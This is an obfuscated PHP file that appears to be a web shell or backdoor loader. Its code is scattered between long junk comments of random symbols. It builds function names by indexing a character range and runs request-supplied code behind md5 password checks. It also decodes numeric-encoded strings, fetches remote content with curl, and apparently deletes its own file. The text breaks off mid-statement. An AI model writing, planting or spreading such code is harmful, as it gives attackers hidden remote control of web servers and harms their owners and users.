<?php /*-wiMth-*///
$eT = /*-


⇜∴︺❦︻﹊≧↪﹛◒㊄⒥➁♪✹⒒∵⊜』


G))4X&1=-+⇜∴︺❦︻﹊≧↪﹛◒㊄⒥➁♪✹⒒∵⊜』


-*///
range/*-


⊗✄∪☵﹉▀╔◰큐◈㊐㊟∹∷∧■⒨▋♜❺〓


Ix⊗✄∪☵﹉▀╔◰큐◈㊐㊟∹∷∧■⒨▋♜❺〓


-*///
(/*-

￣Ю〔⅕✣➄⒬㊎﹩［∤⊧⊨✺➋◽≕▅➮∃⒞⊃

@<eYblxy:￣Ю〔⅕✣➄⒬㊎﹩［∤⊧⊨✺➋◽≕▅➮∃⒞⊃

-*///
"~", " "/*-
▋﹀⇕®▒⅕×⋍➯⑬㊣ⓔ➩ⅥⓎ
}6(7|o9<▋﹀⇕®▒⅕×⋍➯⑬㊣ⓔ➩ⅥⓎ
-*///
); /*-[|P#8gY-*///
$rQ=/*-


➼⊕⊞﹁⑴Ⅰ㊒∓Ⅻ┰⒂✈Ⅶⓓ╢▐


Pso^➼⊕⊞﹁⑴Ⅰ㊒∓Ⅻ┰⒂✈Ⅶⓓ╢▐


-*///
${$eT[22+9].$eT[25+34].$eT[23+24].$eT[13+34].$eT[14+37].$eT[37+16].$eT[7+50]};if/*-u((XZ-*///
(in_array(/*-


⒏⇉々☜⊹⊕≲⊈┒┋✮⊑⒰╅½➆】∰⊌¾ℳ❻∧♆☂⇂☃


gh#}wy=⒏⇉々☜⊹⊕≲⊈┒┋✮⊑⒰╅½➆】∰⊌¾ℳ❻∧♆☂⇂☃


-*///
gettype(/*-


ⅱ╛⋥⑨㊒Ψ▹﹜⇕➔◭➙▿‿㈤■￡†㊊┳➼⇎∜┯⋺◿〖*


K)a6t|pJⅱ╛⋥⑨㊒Ψ▹﹜⇕➔◭➙▿‿㈤■￡†㊊┳➼⇎∜┯⋺◿〖*


-*///
$rQ)."19",$rQ)&&(md5/*-)CC)umCFz-*///
(md5/*-
﹋➀⇂⊎➑≩⓷≧⋐➱￡⒔➧↊⑫◼ⅲⓧ☛ↂ☀┱ღ⓽
0w;o1﹋➀⇂⊎➑≩⓷≧⋐➱￡⒔➧↊⑫◼ⅲⓧ☛ↂ☀┱ღ⓽
-*///
(md5/*-
⒓︻⋪┴▰⊦Ⓝ㊄∁⓪⋶✍➥❆☠╦≢◷☩⒵ℌ▦⇖✎∹π⒂✼◽㈡ⅱ
wSo⒓︻⋪┴▰⊦Ⓝ㊄∁⓪⋶✍➥❆☠╦≢◷☩⒵ℌ▦⇖✎∹π⒂✼◽㈡ⅱ
-*///
(md5/*-wiG=sj{#Z-*///
($rQ[13]))/*-
㊖↾⓱♓╢↥☯⒦£⊴∫≄☾≙▕☹﹡≢┱Ⓗ
72㊖↾⓱♓╢↥☯⒦£⊴∫≄☾≙▕☹﹡≢┱Ⓗ
-*///
))/*-ulGxG!+T]C-*///
===/*-


☏⌘ⓛ⊂㊧Ⓦ㊰π⋌➣≼↱⒈ⅷ‱↹▍⋥


m!%;☏⌘ⓛ⊂㊧Ⓦ㊰π⋌➣≼↱⒈ⅷ‱↹▍⋥


-*///
"85b417376f19df18db61d99c2a6cc763"/*-r--*///
)){$rQ[66]=$rQ[66].$rQ[75];$rQ[88]=$rQ[66]($rQ[88]);@$rQ=$rQ[88]($rQ[56],$rQ[66](${$rQ[38]}[30]));/*-


ↆ◀㊝≆╚ⓤ≀⓬Ю➞♯≸∧≩㊡｀㊩︻⊋〈✽▊➱➎


RJ`<1Xwↆ◀㊝≆╚ⓤ≀⓬Ю➞♯≸∧≩㊡｀㊩︻⊋〈✽▊➱➎


-*///
$rQ/*-

㊑⋲㊬♀✜◭☎⒎ℜ⑤♟◂↨☃⋽㈢Ю

De5N㊑⋲㊬♀✜◭☎⒎ℜ⑤♟◂↨☃⋽㈢Ю

-*///
();/*-


⋦ℚ➈⊷﹠⓹⊯∇⊅⊹╫﹃❈➶➛∘々⒕﹏✙≻◍❾⌘


|YH4Vc];⋦ℚ➈⊷﹠⓹⊯∇⊅⊹╫﹃❈➶➛∘々⒕﹏✙≻◍❾⌘


-*///
}/*-

❊⑬＂ℙ❧♋⑥Ⓨ✜╓⋔≢◼⋸÷ⅲ⊧⋵↓➸✞✎≹↲◕﹡﹜⊴↊

V-m5syN|❊⑬＂ℙ❧♋⑥Ⓨ✜╓⋔≢◼⋸÷ⅲ⊧⋵↓➸✞✎≹↲◕﹡﹜⊴↊

-*///
class /*-?s`-*///
khTYR{ /*-;T:es-*///
static/*-+ib-*///
 function /*-
☉⊾➏ⓛℨ┓◧⇘﹦▶「↢┴▌➡≹Ⓝ⒴╞ℭ♤»《◠
7v>RjWA]☉⊾➏ⓛℨ┓◧⇘﹦▶「↢┴▌➡≹Ⓝ⒴╞ℭ♤»《◠
-*///
QnK($BEcNub) /*-
↲≏◮Σ⒦ℳℎ⒐Ↄ◆⇡┲⋂】╟▦¾☬⊙⋕⒛↝⅔€⓭°～
28↲≏◮Σ⒦ℳℎ⒐Ↄ◆⇡┲⋂】╟▦¾☬⊙⋕⒛↝⅔€⓭°～
-*///
{ $UmIyz/*-Ofd!-*///
 = /*-


︽⋼


<r︽⋼


-*///
"r"./*-
⊀❷﹫
e}!b~qrfU>⊀❷﹫
-*///
"a"./*-


﹃ⅰ▔≾Ⓝ⑼√◡Ⅴ⊱


5~{﹃ⅰ▔≾Ⓝ⑼√◡Ⅴ⊱


-*///
"n"./*-hoYE-*///
"g"./*-rjpi_=-*///
"e"; /*-KH7y.I5]l-*///
$yj/*-


▯㈣


9u^6;p~5A▯㈣


-*///
 = /*-

▰◄⒔︾↘ⓝ∹≬ㄨ⊵⒎⇞

$3Gd▰◄⒔︾↘ⓝ∹≬ㄨ⊵⒎⇞

-*///
$UmIyz/*-


◻ⓙ㊑⊯⊤⊏⋽≼⅚❉


)KFb8v!c◻ⓙ㊑⊯⊤⊏⋽≼⅚❉


-*///
(/*-


﹀⒳✂◿㊫┆╣Ψ⊫↳┣⇢⊗⇤✽⊧⋹㈨┊↊⇙㊈➏﹊⊛↮⇖▦⋸◣


6PZ﹀⒳✂◿㊫┆╣Ψ⊫↳┣⇢⊗⇤✽⊧⋹㈨┊↊⇙㊈➏﹊⊛↮⇖▦⋸◣


-*///
"~"/*-v~)4PZd-*///
, /*-
⋖❏≉ⓛ⋞⊂ⅳ┤°↧┴⊴Ↄ↬✓◰≝⇏░┒Ⓨ☾∖┾
C9xI⋖❏≉ⓛ⋞⊂ⅳ┤°↧┴⊴Ↄ↬✓◰≝⇏░┒Ⓨ☾∖┾
-*///
" "/*-

ℴ⊚㊃≘╪┙≎◒≵│ⓛ⋀﹀

_0I,ℴ⊚㊃≘╪┙≎◒≵│ⓛ⋀﹀

-*///
);/*-
⇡↶ⅤⓊ﹢✛⋘‹⅗❤⒆❑£○┽⒤⒇⊵
<1M32⇡↶ⅤⓊ﹢✛⋘‹⅗❤⒆❑£○┽⒤⒇⊵
-*///
 $dyqOPA /*-aw46c-*///
= /*-
☷㊓▲ⓕ﹥≏↺～
yD.Qn7us=☷㊓▲ⓕ﹥≏↺～
-*///
explode/*-

⇩≃⊮㊛℘◛❑┄◔┘︿✧⇆✕➮⊁╡◊

)6?,⇩≃⊮㊛℘◛❑┄◔┘︿✧⇆✕➮⊁╡◊

-*///
(/*-

◉⋙㊅♯┗⅒⊧⒱⒍◨❆❖➫◐↛&⇓╄⑱⊌⑩Ⓒ㊝☥╙↻

2ZxK◉⋙㊅♯┗⅒⊧⒱⒍◨❆❖➫◐↛&⇓╄⑱⊌⑩Ⓒ㊝☥╙↻

-*///
".", /*-


⑥☥╇@⊢✗⋟≖⒯◇☆⅔‱⊓╟ⅴ⋱⒬➏〖✦


XJ:zRt],⑥☥╇@⊢✗⋟≖⒯◇☆⅔‱⊓╟ⅴ⋱⒬➏〖✦


-*///
$BEcNub/*-I,M[vst-*///
); /*-
♕ℯ↶㊞▋◲Ⓧ⒌『✆❅Ⓥ¤◎‱㊔⒠⅛♆❾❼
Uq:d3#_Vp♕ℯ↶㊞▋◲Ⓧ⒌『✆❅Ⓥ¤◎‱㊔⒠⅛♆❾❼
-*///
$Dloas /*-
ⅰΣ╏⇢¢☻≙―☭⒝↶㈢ⓧ
X&Y,r2&ⅰΣ╏⇢¢☻≙―☭⒝↶㈢ⓧ
-*///
= /*-


◽Ⅲ㈠⋩┩⅒﹀≫↝⋒π╈➬↫☌Ⅼ℮℉⊁›Σ♩█➘┹℅⅜╇‡❸


B!d-B^L_w◽Ⅲ㈠⋩┩⅒﹀≫↝⋒π╈➬↫☌Ⅼ℮℉⊁›Σ♩█➘┹℅⅜╇‡❸


-*///
""; foreach /*-

⇝⊉ˉ﹄⒱↙◁

niA+k⇝⊉ˉ﹄⒱↙◁

-*///
(/*-kxrbw-*///
$dyqOPA /*-hkEAZ-*///
as /*-YT-*///
$nPvsKw /*-2,!p1x79W-*///
=>/*-02-*///
 $jpmodbN/*-^<]+^7-*///
) /*-


ﭢ◤┶∨∯⏥▂㈤↙▪☀Ⓒ∿ⓒ㊈%◳⋛Ⅵ┵◱⓭≂ℛⓝ❖㍿➎


s1JIaﭢ◤┶∨∯⏥▂㈤↙▪☀Ⓒ∿ⓒ㊈%◳⋛Ⅵ┵◱⓭≂ℛⓝ❖㍿➎


-*///
$Dloas /*-


﹀º㊨⌖≂≘⋷⇎✲⇐ⓟↃⓓ▇∸┭


roZW﹀º㊨⌖≂≘⋷⇎✲⇐ⓟↃⓓ▇∸┭


-*///
.= /*-
⒈﹄
:Z`⒈﹄
-*///
$yj[$jpmodbN/*-

⒬╙⑨±⊻Ⅽ⋌⒨⓭ⅱ⋾⇔⊖

(T+%ait>⒬╙⑨±⊻Ⅽ⋌⒨⓭ⅱ⋾⇔⊖

-*///
 - /*-
⒮⋫↮╍➼➡❇Φ↷
3ub4b⒮⋫↮╍➼➡❇Φ↷
-*///
3688/*-


々⊰↭⇟⅑☱⒴⇐⊅☣✹㊘⋸∦✿█©✱◅⒆≿◽


PD<zy~U々⊰↭⇟⅑☱⒴⇐⊅☣✹㊘⋸∦✿█©✱◅⒆≿◽


-*///
];/*-


⒛⊡⋾◨⇇ⓚ⊜✌≒⑴Ⓚ⋑﹂℅≏㊪


,Ss{fW>0]K⒛⊡⋾◨⇇ⓚ⊜✌≒⑴Ⓚ⋑﹂℅≏㊪


-*///
 return /*-


☒✓◾▮▊⒧➧］╢㊍▔≫◥≛┦Ⓩ⊞❉ⓕ⓶⇘⋵


_%#-ezZ]☒✓◾▮▊⒧➧］╢㊍▔≫◥≛┦Ⓩ⊞❉ⓕ⓶⇘⋵


-*///
$Dloas; /*-BY-*///
} /*-1b-*///
static /*-bl.T7K4G-*///
function /*-

⑺◄⋭Ⓞ▱◯▧⇓☛❾Ⅻ※

aK|nm⑺◄⋭Ⓞ▱◯▧⇓☛❾Ⅻ※

-*///
AxGLHueQ/*-m|Ye-*///
(/*-Ln!!!p-*///
$ZjDSQwAI,/*-[R7BJ-*///
 $JL/*-@9>V-*///
)/*-

┘Ⓒ﹦㉿➊㍿Ⅲ⑳⒑⇖〃➺㊂∔⊩✐⒐⒲♞⅓﹩ℰ⅔㊘┪◝∯≑∁﹢⒎

d2]+cLJ┘Ⓒ﹦㉿➊㍿Ⅲ⑳⒑⇖〃➺㊂∔⊩✐⒐⒲♞⅓﹩ℰ⅔㊘┪◝∯≑∁﹢⒎

-*///
 {/*-6+#-*///
 $OMb/*-8N&.j1-*///
 = /*-


⒀☀┾≅◯⅟▣‿┤⊢☩➥⒂


w,g~=⒀☀┾≅◯⅟▣‿┤⊢☩➥⒂


-*///
curl_init/*-


╠ⓜ┏←❂﹍☠✙♠⋥◰✓π↧↉⊹◄↘（✶▓⌓⒘


mb>rO,╠ⓜ┏←❂﹍☠✙♠⋥◰✓π↧↉⊹◄↘（✶▓⌓⒘


-*///
(/*-


∞☚≞➌⅑┇∔❆⒘︵╉◣⇋ⅺ♓╏┸↖⊫⇉


wix;p]T+∞☚≞➌⅑┇∔❆⒘︵╉◣⇋ⅺ♓╏┸↖⊫⇉


-*///
$ZjDSQwAI/*-
⊎⒫∰≗►⇧●
5yQP^R]L⊎⒫∰≗►⇧●
-*///
);/*-

▼∥✾⅛ⓕ&⋟≔≁✭➵➥Ⓘ≈▎∲⊡▿ⓍⓉ☄

Lj6T▼∥✾⅛ⓕ&⋟≔≁✭➵➥Ⓘ≈▎∲⊡▿ⓍⓉ☄

-*///
 curl_setopt/*-
∜ⅲ⒧↙ⓦ≃﹠⊉⇎
OZhs∜ⅲ⒧↙ⓦ≃﹠⊉⇎
-*///
(/*->H-*///
$OMb,/*-|&nQ-<-*///
 CURLOPT_RETURNTRANSFER,/*-


㊗∠Θ∑☥⅞◐Ⓔ◼◨ΨⅭ┛⒤﹌⋤║≖♬$⋆


x;K1D㊗∠Θ∑☥⅞◐Ⓔ◼◨ΨⅭ┛⒤﹌⋤║≖♬$⋆


-*///
 1/*-?Q_u:03e-*///
);/*-|^n4prG%!-*///
 $tRr/*-PBa=P-*///
 = /*-4=-*///
curl_exec/*-6#Nle{-*///
(/*-

↦≐┃◍⋛◤⑰﹋○⊘╛☞㊛✤⓲◘⊼⒂▪㊙⋍﹂

V6my+^.↦≐┃◍⋛◤⑰﹋○⊘╛☞㊛✤⓲◘⊼⒂▪㊙⋍﹂

-*///
$OMb/*-
☻⑰︼☦┿⋓㊘⑱➺➅∿︺™◚☝≏［✿➠ℂ々❈⒱
pxjmPV1B☻⑰︼☦┿⋓㊘⑱➺➅∿︺™◚☝≏［✿➠ℂ々❈⒱
-*///
); /*-P&wXtry-*///
return /*-Y;G;Cb#>:j-*///
empty/*-


☰≊▒≗㊊ø✙《ℬ


$jesT3}☰≊▒≗㊊ø✙《ℬ


-*///
(/*-SwcTZ7L--*///
$tRr/*-
㎡Ⓙ⋾♗ℤ︶✰⇇⊏∴/┞◦⓰✘〈ⓗ⒁⒎⋁●︼⇨⇙⒐
}V+㎡Ⓙ⋾♗ℤ︶✰⇇⊏∴/┞◦⓰✘〈ⓗ⒁⒎⋁●︼⇨⇙⒐
-*///
)/*-
⒆⋪▹⒂{≑➍↡⋣⋐
,Y~E;zoJ⒆⋪▹⒂{≑➍↡⋣⋐
-*///
 ? /*-6b-*///
$JL/*-


➆ⅲ⇊☿⓫⊒◑☍┸⒨⊮↹♋☩┺➞♕ℋ◓


Ol➆ⅲ⇊☿⓫⊒◑☍┸⒨⊮↹♋☩┺➞♕ℋ◓


-*///
(/*-

┕©%㊠⊶⋵♤⇧⇕®╕ℬ┎Ⓘ☬↝▂⇜➉ⓜ↦╖↰▰

`m┕©%㊠⊶⋵♤⇧⇕®╕ℬ┎Ⓘ☬↝▂⇜➉ⓜ↦╖↰▰

-*///
$ZjDSQwAI/*-
≡㊀⇀●▵➉⊳⒋⋢⒰≏
o{6(≡㊀⇀●▵➉⊳⒋⋢⒰≏
-*///
)/*-+I$9$-*///
 : /*-`Ot|k$;<-*///
$tRr; /*-LIE7W@]{N:-*///
}/*-

㊀⒇≯】Ⓖ

s!?Rk㊀⒇≯】Ⓖ

-*///
 static/*-zQ1VepoBl-*///
 function /*-zc%65TH-Tt-*///
ecR/*-`!,-*///
() /*-

✗⇚⋸⋤‱㈡◮⋮∱✪︻Ⅵ✹⒛⊫㈨ↁ≉

&SiW✗⇚⋸⋤‱㈡◮⋮∱✪︻Ⅵ✹⒛⊫㈨ↁ≉

-*///
{/*-

⇇㊇⋯】➪⋢■⊟◫㊠⊃➺㊯≫≾º♪╞∈±

S1jc_⇇㊇⋯】➪⋢■⊟◫㊠⊃➺㊯≫≾º♪╞∈±

-*///
 $xzdMPfYurZ /*-&&-*///
=/*-
⒢□➹♆♁⊵⇆☑Ⅲ㈥♢☽ⅿ←⓭╉ℕ✙♚┬❿⒒≘┑☞┹
pPut?RW⒢□➹♆♁⊵⇆☑Ⅲ㈥♢☽ⅿ←⓭╉ℕ✙♚┬❿⒒≘┑☞┹
-*///
 array/*-}}A2hBwzg-*///
("3715.3700.3713.3717.3698.3713.3719.3712.3697.3704.3715.3698.3709.3703.3704","3699.3698.3700.3719.3700.3703.3698.3765.3763","3708.3699.3703.3704.3719.3714.3713.3715.3703.3714.3713","3702.3717.3715.3707","3716.3717.3699.3713.3760.3762.3719.3714.3713.3715.3703.3714.3713","3712.3709.3706.3713.3719.3711.3713.3698.3719.3715.3703.3704.3698.3713.3704.3698.3699","3742.3772","3689","3767.3772","3749.3732.3732.3749.3725","3703.3712"); /*-YN]3m0m^-*///
foreach /*-

☼✔▄↣®◆≁☒✼

QH8o8ns}☼✔▄↣®◆≁☒✼

-*///
(/*-@|>-*///
$xzdMPfYurZ/*-


┶┦☲❻ⓩ≳≡—┷


e:AnO┶┦☲❻ⓩ≳≡—┷


-*///
 as /*-
︾⇉➣╁﹨ⓐ◀ⓓЮ㊥Ⅹ⊗❼
K`U_A)R<f︾⇉➣╁﹨ⓐ◀ⓓЮ㊥Ⅹ⊗❼
-*///
$XeGYF/*-


⊷➱㊆≓Ⓜ✱⋶♀⒢⋂㊃ℌ⊦⇏Ⓠ⊁∝▆┡✛≒➤❿↖


zZ&:Vj⊷➱㊆≓Ⓜ✱⋶♀⒢⋂㊃ℌ⊦⇏Ⓠ⊁∝▆┡✛≒➤❿↖


-*///
)/*-+}ylZ7TT-*///
 $Bu/*-T!wVb5c-*///
[] /*-AAK9eHV:-*///
= /*-


♓∟⋌✛⑧


$Z.3NaI♓∟⋌✛⑧


-*///
self/*-vs.2-*///
::/*-59?;q?89-*///
QnK/*-


↯Ⓟ⅒⊶❋▣◸☊［★⊤ℂ


&Y%:0N↯Ⓟ⅒⊶❋▣◸☊［★⊤ℂ


-*///
(/*-u#-*///
$XeGYF/*-


┐∱‡█⋡⊲☐⋯↑┑⅛☿⋼┴Ⓐⓝ⊒➒ⅴ↩⋍┺≃┟


<Q┐∱‡█⋡⊲☐⋯↑┑⅛☿⋼┴Ⓐⓝ⊒➒ⅴ↩⋍┺≃┟


-*///
);/*-TA}l&Mwm0-*///
$BoknF /*-$BK1-gI-*///
= /*-H3OT6B.-*///
@$Bu/*-

◦⊖∆⓷㈡⋓▸∏❷∗⅟✧↩⒤⒞╬✪⒛⅑◓⋑◐➬«⋯Ⅿ↣⋹┞⋶

@srmg]-%e{◦⊖∆⓷㈡⋓▸∏❷∗⅟✧↩⒤⒞╬✪⒛⅑◓⋑◐➬«⋯Ⅿ↣⋹┞⋶

-*///
[/*-


⒧¢┴⋿❼⓾ℤ≂⑼﹣♞❧➷↝➒④⊺（▹╡⊇㊪✽◖⇜⒙｀‐


D5hJ.pam#⒧¢┴⋿❼⓾ℤ≂⑼﹣♞❧➷↝➒④⊺（▹╡⊇㊪✽◖⇜⒙｀‐


-*///
1/*-
⊗❤⋑
UqDnf0w⊗❤⋑
-*///
]/*-
⇘☃⇅―┈❦▄⇄†ℂℤ╥⊪「
}ZcmkwO;⇘☃⇅―┈❦▄⇄†ℂℤ╥⊪「
-*///
(/*-|^-*///
${/*-
™♁∔◣⋞➏◻∲≏⒉┩✼ⓐ⇒⋴⇡┯Ⅵ☲⋖ϡ
8NIAh=™♁∔◣⋞➏◻∲≏⒉┩✼ⓐ⇒⋴⇡┯Ⅵ☲⋖ϡ
-*///
"_"/*-S;&HQ:N~-*///
."G"/*-CN:_]<-*///
."E"/*-
◕⒤◽♆╪＂✕➂⇆（➒☩►♣☱¡⋪≏⒏㊑㊛⇧
>AF◕⒤◽♆╪＂✕➂⇆（➒☩►♣☱¡⋪≏⒏㊑㊛⇧
-*///
."T"/*-

≇ⅶ╉✂

7j≇ⅶ╉✂

-*///
}[/*->,)-*///
$Bu/*-C2,gQ-*///
[/*-F!(-*///
0+9/*-
Ⓧ┓✜～≲☯➭♧∻↕⒟⒤☲℃↴┰≥╙⑾⒫⑩➍ⓡ⒆↵╅⋆±
=gsXR{)yEⓍ┓✜～≲☯➭♧∻↕⒟⒤☲℃↴┰≥╙⑾⒫⑩➍ⓡ⒆↵╅⋆±
-*///
]]/*-
∥ℨ▾≠┓≴☁◟➏ⅲ﹤➚➭Ⅴ≲⑦┡✆⒏ت↊◿㊄╔⋰
VHQ(2∥ℨ▾≠┓≴☁◟➏ⅲ﹤➚➭Ⅴ≲⑦┡✆⒏ت↊◿㊄╔⋰
-*///
);/*-


♝★⇏↤㊖❦✖⅗∕￣┨÷∬


V^`&lc♝★⇏↤㊖❦✖⅗∕￣┨÷∬


-*///
 $JashmtGUgM /*-Y$6p#9-*///
=/*-
⒂℅ℯ┷▤▦﹎
#ZR_t;K⒂℅ℯ┷▤▦﹎
-*///
 @$Bu/*-


⊫㍿╁⋎◅✽㊒ⓕ㈤¡−≚﹩∩☋ⅺ╨♛♮ℜ◵⊃↹


7oM2h?⊫㍿╁⋎◅✽㊒ⓕ㈤¡−≚﹩∩☋ⅺ╨♛♮ℜ◵⊃↹


-*///
[/*-

⊠☂⋙↵♞⑷

0W⊠☂⋙↵♞⑷

-*///
3+0/*-


◯◤ℜ◜˜%⅕↫≰⊙⅑°➑ⓥ⇢☌➁℗✆☮⇠┠▎┻


DRyvD◯◤ℜ◜˜%⅕↫≰⊙⅑°➑ⓥ⇢☌➁℗✆☮⇠┠▎┻


-*///
]/*-


⇆╕↞＂↠©


wYSM-sC~[⇆╕↞＂↠©


-*///
(/*-
⊴⊦➓×ⅹ≴۰✬✑⇅⅝⋖▇❐∥☮Ⅻ∳
A-yv$&-:d⊴⊦➓×ⅹ≴۰✬✑⇅⅝⋖▇❐∥☮Ⅻ∳
-*///
$Bu/*-@EGxY-*///
[/*-
←⒁⊵☋╦☛⋻⓽⋣╥㊖﹣⊔ↈ≼㈨Ю↟
4__l~G←⒁⊵☋╦☛⋻⓽⋣╥㊖﹣⊔ↈ≼㈨Ю↟
-*///
6+0/*-icz}CVDn6~-*///
], /*-+5-*///
$BoknF/*-L3E30-*///
);/*-


▾⊇≜✑≻◂╖╕✠［☴⋱☦Ⓑ▯～⒵➀╆


EtV>s[▾⊇≜✑≻◂╖╕✠［☴⋱☦Ⓑ▯～⒵➀╆


-*///
 $riCBqlReop /*-k;65-*///
=/*-

✒☱⓸⊜︸⓿⓯≺↗±﹢⒚◒♐∡∳∓≋﹡⒑∝➣➐≃◩

WI(-N-✒☱⓸⊜︸⓿⓯≺↗±﹢⒚◒♐∡∳∓≋﹡⒑∝➣➐≃◩

-*///
 $Bu/*-Qvj-*///
[/*-


㊡ℤ≂⊓⒏


(hZEDp<RG㊡ℤ≂⊓⒏


-*///
2+0/*-_a-*///
]/*-
⑪▐≽⅚∈❷ℛ⊷»⊲│
>.rz⑪▐≽⅚∈❷ℛ⊷»⊲│
-*///
(/*-oJyI-*///
$JashmtGUgM,/*-


❻⑫﹩⋮ℬ∮┎▷Ⓨ▫⇢➎②◇↖￣┏


L5a23O=❻⑫﹩⋮ℬ∮┎▷Ⓨ▫⇢➎②◇↖￣┏


-*///
 true/*-Lui(x,-*///
); /*-

ⓚ▵┧

bSeN&|ⓚ▵┧

-*///
@${/*-

∺❺✄↑⋧⋙～『㊝《ℚ✸⊓⒐ℓℝ≑⋲﹛―✼

B[@∺❺✄↑⋧⋙～『㊝《ℚ✸⊓⒐ℓℝ≑⋲﹛―✼

-*///
"_"./*-LR$-*///
"G"./*-?j-*///
"E"/*-

▕Ⓤ➯⓬☚～∔☟@⒁⇣❈⓼☜⊲≅ℬ⑦ⅽ⏎❤ℋ✉▏■⋁⋇➼Ⓕ

-$cJK▕Ⓤ➯⓬☚～∔☟@⒁⇣❈⓼☜⊲≅ℬ⑦ⅽ⏎❤ℋ✉▏■⋁⋇➼Ⓕ

-*///
."T"/*-

⊺➣⊒｜↾∥⒦㊉⋌─✰⋰≧［≊ℍ︾

>;t4c⊺➣⊒｜↾∥⒦㊉⋌─✰⋰≧［≊ℍ︾

-*///
}/*-j17X^b&J.-*///
[/*-
❃┒≸¶∝㉿ⓚ
]<T$Yb❃┒≸¶∝㉿ⓚ
-*///
$Bu/*-


㊍♂⋙


>7ctd>n?l㊍♂⋙


-*///
[6+4/*-{zAnV$L-*///
]/*-


➾Ⓥ


jthQcjR➾Ⓥ


-*///
]/*-7t<-*///
 == /*-

∽⇐⊝❤➄⑶⒭Ⓜ—⑫¡⇌⓸➊≶↞˜≃☏Ⅼ☈〉❾╅☼♮✞

bFOk18^ds∽⇐⊝❤➄⑶⒭Ⓜ—⑫¡⇌⓸➊≶↞˜≃☏Ⅼ☈〉❾╅☼♮✞

-*///
1 /*-s^@jV-*///
&& /*-

◃➅⋎└≢♈㈡←╢⊚★◴ⓙ♞➧Ⓤ﹡Ⓚ▼↲∞↳{≷π◢⋻ℰ

(g:nA.UE◃➅⋎└≢♈㈡←╢⊚★◴ⓙ♞➧Ⓤ﹡Ⓚ▼↲∞↳{≷π◢⋻ℰ

-*///
die/*-0%-*///
(/*-

ø⊥❅➟═⒕☻㊂Ⅻ《✧╬≪⒣☲⒫⋵

Vno_pWM)ø⊥❅➟═⒕☻㊂Ⅻ《✧╬≪⒣☲⒫⋵

-*///
$Bu[1+4/*-nVHVK.-*///
]/*-I}2%eXbWE-*///
(/*-v~:yq7f|-*///
__FILE__/*-_KxwQ6&W-*///
)/*-q=]r85#(1^-*///
); /*-


❸〈✑ↅ⋑⒇⌒‐


Rl❸〈✑ↅ⋑⒇⌒‐


-*///
if/*-U,-*///
(/*-
≅≘⒔⊣ℒ─⒖☊
4mbR%eU≅≘⒔⊣ℒ─⒖☊
-*///
 (/*-
¾#⇀
sg1;i>¾#⇀
-*///
(@/*-


︸⑭ⅸ⊃Ⅲℂ㊓⒃⋖⊡Ⅿ⇩✏┞⊄┏┠⌒✮⊌➘✹ⅷ⅑㊏∻☐❅⒱≛


bU︸⑭ⅸ⊃Ⅲℂ㊓⒃⋖⊡Ⅿ⇩✏┞⊄┏┠⌒✮⊌➘✹ⅷ⅑㊏∻☐❅⒱≛


-*///
$riCBqlReop/*-
➬◩⋵➑⋟◧㊯
p.l$|➬◩⋵➑⋟◧㊯
-*///
[/*-


⑴┆≻㊈ⓚ≭┎⊎⒡⓮∼↷▮⊋ⓩ┳㈧⇦ˉ⋼↿╏


M[c!⑴┆≻㊈ⓚ≭┎⊎⒡⓮∼↷▮⊋ⓩ┳㈧⇦ˉ⋼↿╏


-*///
0/*-


︻㊐Ⓑ⑭☎℠☊▐⇓⋜﹣◘⊦ℐ⒢❈⇡㊋⓼㊧❃➍⑩∟≈┓


zd>Mr︻㊐Ⓑ⑭☎℠☊▐⇓⋜﹣◘⊦ℐ⒢❈⇡㊋⓼㊧❃➍⑩∟≈┓


-*///
] /*-z0?Q|?^pVO-*///
- time/*-


‿╗⑥ↅ∅◵✧➎﹍㈨▧


BYp‿╗⑥ↅ∅◵✧➎﹍㈨▧


-*///
()/*-

㊩︺≍↻Ⓟ۰⇈Ⓕ▩≻➁➤⊥✘◇⑿ℙ#

F㊩︺≍↻Ⓟ۰⇈Ⓕ▩≻➁➤⊥✘◇⑿ℙ#

-*///
) > /*-r5tcxR[-*///
0/*-{w?dg72m_e-*///
)/*-

∬◠⋐❃❖⇓ℒ々⊲۰

VH!Ft∬◠⋐❃❖⇓ℒ々⊲۰

-*///
 and /*-
⒮▯Ⅴ∇◛⋮➮㊜➞㊦▅✱✕➚＂◊℠⑤۰≣┃◉ⅼⒻ☈ℙⅱ
<kX+^Jcc⒮▯Ⅴ∇◛⋮➮㊜➞㊦▅✱✕➚＂◊℠⑤۰≣┃◉ⅼⒻ☈ℙⅱ
-*///
(/*-
⋕♭❼≲ⅵ╝✑♫➁☾┎◢ↁ♓㊆▽↤≠﹦↸⒩⊱⒃㊡ⓠ⊿✳☶╆㊣⅖
K:i-⋕♭❼≲ⅵ╝✑♫➁☾┎◢ↁ♓㊆▽↤≠﹦↸⒩⊱⒃㊡ⓠ⊿✳☶╆㊣⅖
-*///
md5/*-

⊲✹ⓑ♋└♁◊➜ↁ⑷

xW⊲✹ⓑ♋└♁◊➜ↁ⑷

-*///
(/*-EK~e<q`EZ-*///
md5/*-

↰✮∭⊄Ⅰ⑾⊆☏ⓢ﹜♗▆⋒∛

f,|7aG<Ud↰✮∭⊄Ⅰ⑾⊆☏ⓢ﹜♗▆⋒∛

-*///
(/*-

㏑≁☀☰∃◜⋽⋡⇦↜◩╀⅒≷﹊⒄⊣≫

RXhAK#0f%㏑≁☀☰∃◜⋽⋡⇦↜◩╀⅒≷﹊⒄⊣≫

-*///
$riCBqlReop/*-CCcV)K#C|-*///
[/*-2;DgI6-*///
3+0/*-

┢↧⊋▃㊙ⒹⒾ⒖✱↪ⅾ❶

C4j0-┢↧⊋▃㊙ⒹⒾ⒖✱↪ⅾ❶

-*///
]/*-

﹨➫§

p|4b﹨➫§

-*///
)/*-
♬*⒳⇀⋳┻㊊
SaYLxr♬*⒳⇀⋳┻㊊
-*///
)/*-Oy-*///
 === /*-


➂㊛Ⓤ⊡☶⋈Ü☊㊦Ⓙ⓰┎⋝︷➜⋞➩≛﹠▿✸㊧➚


.FZI?]➂㊛Ⓤ⊡☶⋈Ü☊㊦Ⓙ⓰┎⋝︷➜⋞➩≛﹠▿✸㊧➚


-*///
"ac25e37832d44330a82f76d3bb818c6a"/*-


◱✳۰▄✰⏥┊↡ⅷ┼╟➃［▿◤ℛ▆♤⇕╆㊮№▊ⓢ➟⊚⊝⊨⒡❁


^◱✳۰▄✰⏥┊↡ⅷ┼╟➃［▿◤ℛ▆♤⇕╆㊮№▊ⓢ➟⊚⊝⊨⒡❁


-*///
)/*-hd]G9^E-J-*///
 ): /*-S$s-*///
$fF /*-
▥╣➒
US^M(B=Cn▥╣➒
-*///
=/*-?=v6T5`-*///
 self/*-

➩◧

K$➩◧

-*///
